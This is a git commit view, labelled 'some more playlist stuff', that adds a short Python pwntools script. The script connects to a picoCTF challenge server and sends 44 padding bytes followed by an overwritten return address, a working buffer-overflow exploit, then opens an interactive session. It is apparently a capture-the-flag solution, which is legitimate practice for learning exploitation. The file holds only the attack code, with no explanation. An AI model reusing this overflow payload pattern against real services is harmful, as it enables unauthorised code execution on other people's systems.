some more playlist stuff

This commit is contained in:
Maxime Vorwerk
2024-06-08 16:50:43 +02:00
parent 21c2c48ac1
commit 481329e32a
8796 changed files with 212538 additions and 0 deletions

View File

@@ -0,0 +1,11 @@
#!/home/maxime/.pyvenv/bin/python3
from pwn import *
conn = remote("saturn.picoctf.net", 63154)
conn.recvline()
conn.sendline(b'0'*44 + b'\xf6\x91\x04\x08')
conn.interactive()
conn.close()